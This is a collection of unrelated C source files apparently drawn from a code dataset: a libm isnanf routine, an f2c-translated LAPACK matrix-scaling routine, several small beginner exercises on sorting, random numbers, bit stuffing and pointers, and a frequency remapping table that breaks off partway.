Inc. business. * Permission to use, copy, modify, and distribute this * software is freely granted, provided that this notice * is preserved. * ==================================================== */ #ifdef POK_NEEDS_LIBMATH /* * isnanf(x) returns 1 is x is nan, else 0; * no branching! */ #include <libm.h> #include "math_private.h" int isnanf(float x) { int32_t ix; GET_FLOAT_WORD(ix, x); ix &= 0x7fffffff; ix = 0x7f800000 - ix; return (int)(((uint32_t)(ix)) >> 31); } #endif
the_stack_data/41855.c
#include <stdio.h> #include <string.h> int main() { int repeat, check, winner, alunos; char nome[alunos][30], aux[30]; scanf("%d %d", &alunos, &winner); for (repeat = 0; repeat < alunos; repeat ++) { getchar(); scanf("%[^\n]", nome[repeat]); } for (repeat = 0; repeat < alunos; repeat ++) { for (check = 0; check < alunos; check ++) { if (strcmp(nome[repeat],nome[check]) < 0) { strcpy(aux,nome[repeat]); strcpy(nome[repeat],nome[check]); strcpy(nome[check],aux); } } } printf("%s\n", nome[winner - 1]); return(0); }
the_stack_data/25138105.c
#include <stdio.h> #include <stdlib.h> #include <time.h> int main () { srand(1); int i; for(i = 1; i <= 343; i++) { rand(); } for(i = 344; i <= 350; i++) { printf("%d\n", ((unsigned int)rand())); } return 0; }
the_stack_data/111077892.c
#include <math.h> #include <stdlib.h> #include <string.h> #include <stdio.h> #include <complex.h> #ifdef complex #undef complex #endif #ifdef I #undef I #endif #if defined(_WIN64) typedef long long BLASLONG; typedef unsigned long long BLASULONG; #else typedef long BLASLONG; typedef unsigned long BLASULONG; #endif #ifdef LAPACK_ILP64 typedef BLASLONG blasint; #if defined(_WIN64) #define blasabs(x) llabs(x) #else #define blasabs(x) labs(x) #endif #else typedef int blasint; #define blasabs(x) abs(x) #endif typedef blasint integer; typedef unsigned int uinteger; typedef char *address; typedef short int shortint; typedef float real; typedef double doublereal; typedef struct { real r, i; } complex; typedef struct { doublereal r, i; } doublecomplex; #ifdef _MSC_VER static inline _Fcomplex Cf(complex *z) {_Fcomplex zz={z->r , z->i}; return zz;} static inline _Dcomplex Cd(doublecomplex *z) {_Dcomplex zz={z->r , z->i};return zz;} static inline _Fcomplex * _pCf(complex *z) {return (_Fcomplex*)z;} static inline _Dcomplex * _pCd(doublecomplex *z) {return (_Dcomplex*)z;} #else static inline _Complex float Cf(complex *z) {return z->r + z->i*_Complex_I;} static inline _Complex double Cd(doublecomplex *z) {return z->r + z->i*_Complex_I;} static inline _Complex float * _pCf(complex *z) {return (_Complex float*)z;} static inline _Complex double * _pCd(doublecomplex *z) {return (_Complex double*)z;} #endif #define pCf(z) (*_pCf(z)) #define pCd(z) (*_pCd(z)) typedef int logical; typedef short int shortlogical; typedef char logical1; typedef char integer1; #define TRUE_ (1) #define FALSE_ (0) /* Extern is for use with -E */ #ifndef Extern #define Extern extern #endif /* I/O stuff */ typedef int flag; typedef int ftnlen; typedef int ftnint; /*external read, write*/ typedef struct { flag cierr; ftnint ciunit; flag ciend; char *cifmt; ftnint cirec; } cilist; /*internal read, write*/ typedef struct { flag icierr; char *iciunit; flag iciend; char *icifmt; ftnint icirlen; ftnint icirnum; } icilist; /*open*/ typedef struct { flag oerr; ftnint ounit; char *ofnm; ftnlen ofnmlen; char *osta; char *oacc; char *ofm; ftnint orl; char *oblnk; } olist; /*close*/ typedef struct { flag cerr; ftnint cunit; char *csta; } cllist; /*rewind, backspace, endfile*/ typedef struct { flag aerr; ftnint aunit; } alist; /* inquire */ typedef struct { flag inerr; ftnint inunit; char *infile; ftnlen infilen; ftnint *inex; /*parameters in standard's order*/ ftnint *inopen; ftnint *innum; ftnint *innamed; char *inname; ftnlen innamlen; char *inacc; ftnlen inacclen; char *inseq; ftnlen inseqlen; char *indir; ftnlen indirlen; char *infmt; ftnlen infmtlen; char *inform; ftnint informlen; char *inunf; ftnlen inunflen; ftnint *inrecl; ftnint *innrec; char *inblank; ftnlen inblanklen; } inlist; #define VOID void union Multitype { /* for multiple entry points */ integer1 g; shortint h; integer i; /* longint j; */ real r; doublereal d; complex c; doublecomplex z; }; typedef union Multitype Multitype; struct Vardesc { /* for Namelist */ char *name; char *addr; ftnlen *dims; int type; }; typedef struct Vardesc Vardesc; struct Namelist { char *name; Vardesc **vars; int nvars; }; typedef struct Namelist Namelist; #define abs(x) ((x) >= 0 ? (x) : -(x)) #define dabs(x) (fabs(x)) #define f2cmin(a,b) ((a) <= (b) ? (a) : (b)) #define f2cmax(a,b) ((a) >= (b) ? (a) : (b)) #define dmin(a,b) (f2cmin(a,b)) #define dmax(a,b) (f2cmax(a,b)) #define bit_test(a,b) ((a) >> (b) & 1) #define bit_clear(a,b) ((a) & ~((uinteger)1 << (b))) #define bit_set(a,b) ((a) | ((uinteger)1 << (b))) #define abort_() { sig_die("Fortran abort routine called", 1); } #define c_abs(z) (cabsf(Cf(z))) #define c_cos(R,Z) { pCf(R)=ccos(Cf(Z)); } #ifdef _MSC_VER #define c_div(c, a, b) {Cf(c)._Val[0] = (Cf(a)._Val[0]/Cf(b)._Val[0]); Cf(c)._Val[1]=(Cf(a)._Val[1]/Cf(b)._Val[1]);} #define z_div(c, a, b) {Cd(c)._Val[0] = (Cd(a)._Val[0]/Cd(b)._Val[0]); Cd(c)._Val[1]=(Cd(a)._Val[1]/df(b)._Val[1]);} #else #define c_div(c, a, b) {pCf(c) = Cf(a)/Cf(b);} #define z_div(c, a, b) {pCd(c) = Cd(a)/Cd(b);} #endif #define c_exp(R, Z) {pCf(R) = cexpf(Cf(Z));} #define c_log(R, Z) {pCf(R) = clogf(Cf(Z));} #define c_sin(R, Z) {pCf(R) = csinf(Cf(Z));} //#define c_sqrt(R, Z) {*(R) = csqrtf(Cf(Z));} #define c_sqrt(R, Z) {pCf(R) = csqrtf(Cf(Z));} #define d_abs(x) (fabs(*(x))) #define d_acos(x) (acos(*(x))) #define d_asin(x) (asin(*(x))) #define d_atan(x) (atan(*(x))) #define d_atn2(x, y) (atan2(*(x),*(y))) #define d_cnjg(R, Z) { pCd(R) = conj(Cd(Z)); } #define r_cnjg(R, Z) { pCf(R) = conjf(Cf(Z)); } #define d_cos(x) (cos(*(x))) #define d_cosh(x) (cosh(*(x))) #define d_dim(__a, __b) ( *(__a) > *(__b) ? *(__a) - *(__b) : 0.0 ) #define d_exp(x) (exp(*(x))) #define d_imag(z) (cimag(Cd(z))) #define r_imag(z) (cimagf(Cf(z))) #define d_int(__x) (*(__x)>0 ? floor(*(__x)) : -floor(- *(__x))) #define r_int(__x) (*(__x)>0 ? floor(*(__x)) : -floor(- *(__x))) #define d_lg10(x) ( 0.43429448190325182765 * log(*(x)) ) #define r_lg10(x) ( 0.43429448190325182765 * log(*(x)) ) #define d_log(x) (log(*(x))) #define d_mod(x, y) (fmod(*(x), *(y))) #define u_nint(__x) ((__x)>=0 ? floor((__x) + .5) : -floor(.5 - (__x))) #define d_nint(x) u_nint(*(x)) #define u_sign(__a,__b) ((__b) >= 0 ? ((__a) >= 0 ? (__a) : -(__a)) : -((__a) >= 0 ? (__a) : -(__a))) #define d_sign(a,b) u_sign(*(a),*(b)) #define r_sign(a,b) u_sign(*(a),*(b)) #define d_sin(x) (sin(*(x))) #define d_sinh(x) (sinh(*(x))) #define d_sqrt(x) (sqrt(*(x))) #define d_tan(x) (tan(*(x))) #define d_tanh(x) (tanh(*(x))) #define i_abs(x) abs(*(x)) #define i_dnnt(x) ((integer)u_nint(*(x))) #define i_len(s, n) (n) #define i_nint(x) ((integer)u_nint(*(x))) #define i_sign(a,b) ((integer)u_sign((integer)*(a),(integer)*(b))) #define pow_dd(ap, bp) ( pow(*(ap), *(bp))) #define pow_si(B,E) spow_ui(*(B),*(E)) #define pow_ri(B,E) spow_ui(*(B),*(E)) #define pow_di(B,E) dpow_ui(*(B),*(E)) #define pow_zi(p, a, b) {pCd(p) = zpow_ui(Cd(a), *(b));} #define pow_ci(p, a, b) {pCf(p) = cpow_ui(Cf(a), *(b));} #define pow_zz(R,A,B) {pCd(R) = cpow(Cd(A),*(B));} #define s_cat(lpp, rpp, rnp, np, llp) { ftnlen i, nc, ll; char *f__rp, *lp; ll = (llp); lp = (lpp); for(i=0; i < (int)*(np); ++i) { nc = ll; if((rnp)[i] < nc) nc = (rnp)[i]; ll -= nc; f__rp = (rpp)[i]; while(--nc >= 0) *lp++ = *(f__rp)++; } while(--ll >= 0) *lp++ = ' '; } #define s_cmp(a,b,c,d) ((integer)strncmp((a),(b),f2cmin((c),(d)))) #define s_copy(A,B,C,D) { int __i,__m; for (__i=0, __m=f2cmin((C),(D)); __i<__m && (B)[__i] != 0; ++__i) (A)[__i] = (B)[__i]; } #define sig_die(s, kill) { exit(1); } #define s_stop(s, n) {exit(0);} static char junk[] = "\n@(#)LIBF77 VERSION 19990503\n"; #define z_abs(z) (cabs(Cd(z))) #define z_exp(R, Z) {pCd(R) = cexp(Cd(Z));} #define z_sqrt(R, Z) {pCd(R) = csqrt(Cd(Z));} #define myexit_() break; #define mycycle() continue; #define myceiling(w) {ceil(w)} #define myhuge(w) {HUGE_VAL} //#define mymaxloc_(w,s,e,n) {if (sizeof(*(w)) == sizeof(double)) dmaxloc_((w),*(s),*(e),n); else dmaxloc_((w),*(s),*(e),n);} #define mymaxloc(w,s,e,n) {dmaxloc_(w,*(s),*(e),n)} /* procedure parameter types for -A and -C++ */ #define F2C_proc_par_types 1 #ifdef __cplusplus typedef logical (*L_fp)(...); #else typedef logical (*L_fp)(); #endif static float spow_ui(float x, integer n) { float pow=1.0; unsigned long int u; if(n != 0) { if(n < 0) n = -n, x = 1/x; for(u = n; ; ) { if(u & 01) pow *= x; if(u >>= 1) x *= x; else break; } } return pow; } static double dpow_ui(double x, integer n) { double pow=1.0; unsigned long int u; if(n != 0) { if(n < 0) n = -n, x = 1/x; for(u = n; ; ) { if(u & 01) pow *= x; if(u >>= 1) x *= x; else break; } } return pow; } #ifdef _MSC_VER static _Fcomplex cpow_ui(complex x, integer n) { complex pow={1.0,0.0}; unsigned long int u; if(n != 0) { if(n < 0) n = -n, x.r = 1/x.r, x.i=1/x.i; for(u = n; ; ) { if(u & 01) pow.r *= x.r, pow.i *= x.i; if(u >>= 1) x.r *= x.r, x.i *= x.i; else break; } } _Fcomplex p={pow.r, pow.i}; return p; } #else static _Complex float cpow_ui(_Complex float x, integer n) { _Complex float pow=1.0; unsigned long int u; if(n != 0) { if(n < 0) n = -n, x = 1/x; for(u = n; ; ) { if(u & 01) pow *= x; if(u >>= 1) x *= x; else break; } } return pow; } #endif #ifdef _MSC_VER static _Dcomplex zpow_ui(_Dcomplex x, integer n) { _Dcomplex pow={1.0,0.0}; unsigned long int u; if(n != 0) { if(n < 0) n = -n, x._Val[0] = 1/x._Val[0], x._Val[1] =1/x._Val[1]; for(u = n; ; ) { if(u & 01) pow._Val[0] *= x._Val[0], pow._Val[1] *= x._Val[1]; if(u >>= 1) x._Val[0] *= x._Val[0], x._Val[1] *= x._Val[1]; else break; } } _Dcomplex p = {pow._Val[0], pow._Val[1]}; return p; } #else static _Complex double zpow_ui(_Complex double x, integer n) { _Complex double pow=1.0; unsigned long int u; if(n != 0) { if(n < 0) n = -n, x = 1/x; for(u = n; ; ) { if(u & 01) pow *= x; if(u >>= 1) x *= x; else break; } } return pow; } #endif static integer pow_ii(integer x, integer n) { integer pow; unsigned long int u; if (n <= 0) { if (n == 0 || x == 1) pow = 1; else if (x != -1) pow = x == 0 ? 1/x : 0; else n = -n; } if ((n > 0) || !(n == 0 || x == 1 || x != -1)) { u = n; for(pow = 1; ; ) { if(u & 01) pow *= x; if(u >>= 1) x *= x; else break; } } return pow; } static integer dmaxloc_(double *w, integer s, integer e, integer *n) { double m; integer i, mi; for(m=w[s-1], mi=s, i=s+1; i<=e; i++) if (w[i-1]>m) mi=i ,m=w[i-1]; return mi-s+1; } static integer smaxloc_(float *w, integer s, integer e, integer *n) { float m; integer i, mi; for(m=w[s-1], mi=s, i=s+1; i<=e; i++) if (w[i-1]>m) mi=i ,m=w[i-1]; return mi-s+1; } static inline void cdotc_(complex *z, integer *n_, complex *x, integer *incx_, complex *y, integer *incy_) { integer n = *n_, incx = *incx_, incy = *incy_, i; #ifdef _MSC_VER _Fcomplex zdotc = {0.0, 0.0}; if (incx == 1 && incy == 1) { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc._Val[0] += conjf(Cf(&x[i]))._Val[0] * Cf(&y[i])._Val[0]; zdotc._Val[1] += conjf(Cf(&x[i]))._Val[1] * Cf(&y[i])._Val[1]; } } else { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc._Val[0] += conjf(Cf(&x[i*incx]))._Val[0] * Cf(&y[i*incy])._Val[0]; zdotc._Val[1] += conjf(Cf(&x[i*incx]))._Val[1] * Cf(&y[i*incy])._Val[1]; } } pCf(z) = zdotc; } #else _Complex float zdotc = 0.0; if (incx == 1 && incy == 1) { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc += conjf(Cf(&x[i])) * Cf(&y[i]); } } else { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc += conjf(Cf(&x[i*incx])) * Cf(&y[i*incy]); } } pCf(z) = zdotc; } #endif static inline void zdotc_(doublecomplex *z, integer *n_, doublecomplex *x, integer *incx_, doublecomplex *y, integer *incy_) { integer n = *n_, incx = *incx_, incy = *incy_, i; #ifdef _MSC_VER _Dcomplex zdotc = {0.0, 0.0}; if (incx == 1 && incy == 1) { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc._Val[0] += conj(Cd(&x[i]))._Val[0] * Cd(&y[i])._Val[0]; zdotc._Val[1] += conj(Cd(&x[i]))._Val[1] * Cd(&y[i])._Val[1]; } } else { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc._Val[0] += conj(Cd(&x[i*incx]))._Val[0] * Cd(&y[i*incy])._Val[0]; zdotc._Val[1] += conj(Cd(&x[i*incx]))._Val[1] * Cd(&y[i*incy])._Val[1]; } } pCd(z) = zdotc; } #else _Complex double zdotc = 0.0; if (incx == 1 && incy == 1) { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc += conj(Cd(&x[i])) * Cd(&y[i]); } } else { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc += conj(Cd(&x[i*incx])) * Cd(&y[i*incy]); } } pCd(z) = zdotc; } #endif static inline void cdotu_(complex *z, integer *n_, complex *x, integer *incx_, complex *y, integer *incy_) { integer n = *n_, incx = *incx_, incy = *incy_, i; #ifdef _MSC_VER _Fcomplex zdotc = {0.0, 0.0}; if (incx == 1 && incy == 1) { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc._Val[0] += Cf(&x[i])._Val[0] * Cf(&y[i])._Val[0]; zdotc._Val[1] += Cf(&x[i])._Val[1] * Cf(&y[i])._Val[1]; } } else { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc._Val[0] += Cf(&x[i*incx])._Val[0] * Cf(&y[i*incy])._Val[0]; zdotc._Val[1] += Cf(&x[i*incx])._Val[1] * Cf(&y[i*incy])._Val[1]; } } pCf(z) = zdotc; } #else _Complex float zdotc = 0.0; if (incx == 1 && incy == 1) { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc += Cf(&x[i]) * Cf(&y[i]); } } else { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc += Cf(&x[i*incx]) * Cf(&y[i*incy]); } } pCf(z) = zdotc; } #endif static inline void zdotu_(doublecomplex *z, integer *n_, doublecomplex *x, integer *incx_, doublecomplex *y, integer *incy_) { integer n = *n_, incx = *incx_, incy = *incy_, i; #ifdef _MSC_VER _Dcomplex zdotc = {0.0, 0.0}; if (incx == 1 && incy == 1) { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc._Val[0] += Cd(&x[i])._Val[0] * Cd(&y[i])._Val[0]; zdotc._Val[1] += Cd(&x[i])._Val[1] * Cd(&y[i])._Val[1]; } } else { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc._Val[0] += Cd(&x[i*incx])._Val[0] * Cd(&y[i*incy])._Val[0]; zdotc._Val[1] += Cd(&x[i*incx])._Val[1] * Cd(&y[i*incy])._Val[1]; } } pCd(z) = zdotc; } #else _Complex double zdotc = 0.0; if (incx == 1 && incy == 1) { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc += Cd(&x[i]) * Cd(&y[i]); } } else { for (i=0;i<n;i++) { /* zdotc = zdotc + dconjg(x(i))* y(i) */ zdotc += Cd(&x[i*incx]) * Cd(&y[i*incy]); } } pCd(z) = zdotc; } #endif /* -- translated by f2c (version 20000121). You must link the resulting object file with the libraries: -lf2c -lm (in that order) */ /* > \brief \b SLAQSP scales a symmetric/Hermitian matrix in packed storage, using scaling factors computed by sppequ. */ /* =========== DOCUMENTATION =========== */ /* Online html documentation available at */ /* http://www.netlib.org/lapack/explore-html/ */ /* > \htmlonly */ /* > Download SLAQSP + dependencies */ /* > <a href="http://www.netlib.org/cgi-bin/netlibfiles.tgz?format=tgz&filename=/lapack/lapack_routine/slaqsp. f"> */ /* > [TGZ]</a> */ /* > <a href="http://www.netlib.org/cgi-bin/netlibfiles.zip?format=zip&filename=/lapack/lapack_routine/slaqsp. f"> */ /* > [ZIP]</a> */ /* > <a href="http://www.netlib.org/cgi-bin/netlibfiles.txt?format=txt&filename=/lapack/lapack_routine/slaqsp. f"> */ /* > [TXT]</a> */ /* > \endhtmlonly */ /* Definition: */ /* =========== */ /* SUBROUTINE SLAQSP( UPLO, N, AP, S, SCOND, AMAX, EQUED ) */ /* CHARACTER EQUED, UPLO */ /* INTEGER N */ /* REAL AMAX, SCOND */ /* REAL AP( * ), S( * ) */ /* > \par Purpose: */ /* ============= */ /* > */ /* > \verbatim */ /* > */ /* > SLAQSP equilibrates a symmetric matrix A using the scaling factors */ /* > in the vector S. */ /* > \endverbatim */ /* Arguments: */ /* ========== */ /* > \param[in] UPLO */ /* > \verbatim */ /* > UPLO is CHARACTER*1 */ /* > Specifies whether the upper or lower triangular part of the */ /* > symmetric matrix A is stored. */ /* > = 'U': Upper triangular */ /* > = 'L': Lower triangular */ /* > \endverbatim */ /* > */ /* > \param[in] N */ /* > \verbatim */ /* > N is INTEGER */ /* > The order of the matrix A. N >= 0. */ /* > \endverbatim */ /* > */ /* > \param[in,out] AP */ /* > \verbatim */ /* > AP is REAL array, dimension (N*(N+1)/2) */ /* > On entry, the upper or lower triangle of the symmetric matrix */ /* > A, packed columnwise in a linear array. The j-th column of A */ /* > is stored in the array AP as follows: */ /* > if UPLO = 'U', AP(i + (j-1)*j/2) = A(i,j) for 1<=i<=j; */ /* > if UPLO = 'L', AP(i + (j-1)*(2n-j)/2) = A(i,j) for j<=i<=n. */ /* > */ /* > On exit, the equilibrated matrix: diag(S) * A * diag(S), in */ /* > the same storage format as A. */ /* > \endverbatim */ /* > */ /* > \param[in] S */ /* > \verbatim */ /* > S is REAL array, dimension (N) */ /* > The scale factors for A. */ /* > \endverbatim */ /* > */ /* > \param[in] SCOND */ /* > \verbatim */ /* > SCOND is REAL */ /* > Ratio of the smallest S(i) to the largest S(i). */ /* > \endverbatim */ /* > */ /* > \param[in] AMAX */ /* > \verbatim */ /* > AMAX is REAL */ /* > Absolute value of largest matrix entry. */ /* > \endverbatim */ /* > */ /* > \param[out] EQUED */ /* > \verbatim */ /* > EQUED is CHARACTER*1 */ /* > Specifies whether or not equilibration was done. */ /* > = 'N': No equilibration. */ /* > = 'Y': Equilibration was done, i.e., A has been replaced by */ /* > diag(S) * A * diag(S). */ /* > \endverbatim */ /* > \par Internal Parameters: */ /* ========================= */ /* > */ /* > \verbatim */ /* > THRESH is a threshold value used to decide if scaling should be done */ /* > based on the ratio of the scaling factors. If SCOND < THRESH, */ /* > scaling is done. */ /* > */ /* > LARGE and SMALL are threshold values used to decide if scaling should */ /* > be done based on the absolute size of the largest matrix element. */ /* > If AMAX > LARGE or AMAX < SMALL, scaling is done. */ /* > \endverbatim */ /* Authors: */ /* ======== */ /* > \author Univ. of Tennessee */ /* > \author Univ. of California Berkeley */ /* > \author Univ. of Colorado Denver */ /* > \author NAG Ltd. */ /* > \date December 2016 */ /* > \ingroup realOTHERauxiliary */ /* ===================================================================== */ /* Subroutine */ int slaqsp_(char *uplo, integer *n, real *ap, real *s, real * scond, real *amax, char *equed) { /* System generated locals */ integer i__1, i__2; /* Local variables */ integer i__, j; real large; extern logical lsame_(char *, char *); real small; integer jc; real cj; extern real slamch_(char *); /* -- LAPACK auxiliary routine (version 3.7.0) -- */ /* -- LAPACK is a software package provided by Univ. of Tennessee, -- */ /* -- Univ. of California Berkeley, Univ. of Colorado Denver and NAG Ltd..-- */ /* December 2016 */ /* ===================================================================== */ /* Quick return if possible */ /* Parameter adjustments */ --s; --ap; /* Function Body */ if (*n <= 0) { *(unsigned char *)equed = 'N'; return 0; } /* Initialize LARGE and SMALL. */ small = slamch_("Safe minimum") / slamch_("Precision"); large = 1.f / small; if (*scond >= .1f && *amax >= small && *amax <= large) { /* No equilibration */ *(unsigned char *)equed = 'N'; } else { /* Replace A by diag(S) * A * diag(S). */ if (lsame_(uplo, "U")) { /* Upper triangle of A is stored. */ jc = 1; i__1 = *n; for (j = 1; j <= i__1; ++j) { cj = s[j]; i__2 = j; for (i__ = 1; i__ <= i__2; ++i__) { ap[jc + i__ - 1] = cj * s[i__] * ap[jc + i__ - 1]; /* L10: */ } jc += j; /* L20: */ } } else { /* Lower triangle of A is stored. */ jc = 1; i__1 = *n; for (j = 1; j <= i__1; ++j) { cj = s[j]; i__2 = *n; for (i__ = j; i__ <= i__2; ++i__) { ap[jc + i__ - j] = cj * s[i__] * ap[jc + i__ - j]; /* L30: */ } jc = jc + *n - j + 1; /* L40: */ } } *(unsigned char *)equed = 'Y'; } return 0; /* End of SLAQSP */ } /* slaqsp_ */
the_stack_data/95449426.c
#include <stdio.h> int main(){ int n; scanf("%d", &n); for(int i=1; i<=10000; i++){ if(i%n==2) printf("%d\n", i); } return 0; }
the_stack_data/107368.c
//Contiguous one in five times (stuffing) #include<stdio.h> #include<string.h> int main(){ int a[80],c,n; int count,i,j,b; printf("Enter the length of the bits : "); scanf("%d",&b); printf("Enter the bits : \n"); for(i=0;i<b;i++) scanf("%d",&a[i]); for(i=0;i<b;i++){ if(a[i]==1){ count++; if(count==5){ b=b+1; for(j=b-1;j>i;j--){ a[j]=a[j-1]; } a[i+1]=0; } } else count=0; } for(i=0;i<b;i++) printf("%d ",a[i]); }
the_stack_data/76699190.c
#include <stdio.h> #include <stdlib.h> int** wskaznik_do_tablicy(int,int); int main() { int n,m; printf("Podaj dlugosc tablicy: "); scanf("%i",&n); printf("Podaj szerokosc tablicy: "); scanf("%i",&m); printf("\n\n"); printf("rozmiar int: %d\n",sizeof(int)); int**tablica=wskaznik_do_tablicy(n,m); //stworzenie tablicy **tablica=0; //ustawienie wartosci w miejsce 0,0 *(*(tablica+2))=7; //ustawienie wartosci w miejsce 2,0 *(*(tablica+2)+1)=8; //ustawienie wartosci w miejsce 2,1 *(*tablica+3)=-2; //ustawienie wartosci w miejsce 0,1 //pêtla by sprawdziæ co jest w tablicy i jakie s¹ adres for(int i=0;i<3;i++) { for(int j=0;j<4;j++) { printf("[%d %d] = %d,",i,j,*(*(tablica+i)+j)); //wartoœæ printf("%p\n",*(tablica+i)+j); //adres } } return 0; } int** wskaznik_do_tablicy(int n,int m) { int ** t=malloc(n*sizeof(int*)); int i; for(i=0;i<n;i++) { t[i]=malloc(m*sizeof(int)); } return t; }
the_stack_data/184519012.c
// Remapping table // from: // frequency in the packet header // // to: // correct frequency, or the magic number 9999 to indicate the data can be dropped const unsigned short remap_frequency_sc4[] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, 395, 396, 397, 398, 399, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 480, 481, 482, 483, 484, 485, 486, 487, 488, 489, 490, 491, 492, 493, 494, 495, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 496, 497, 498, 499, 500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 512, 513, 514, 515, 516, 517, 518, 519, 520, 521, 522, 523, 524, 525, 526, 527, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 528, 529, 530, 531, 532, 533, 534, 535, 536, 537, 538, 539, 540, 541, 542, 543, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 544, 545, 546, 547, 548, 549, 550, 551, 552, 553, 554, 555, 556, 557, 558, 559, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 560, 561, 562, 563, 564, 565, 566, 567, 568, 569, 570, 571, 572, 573, 574, 575, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999, 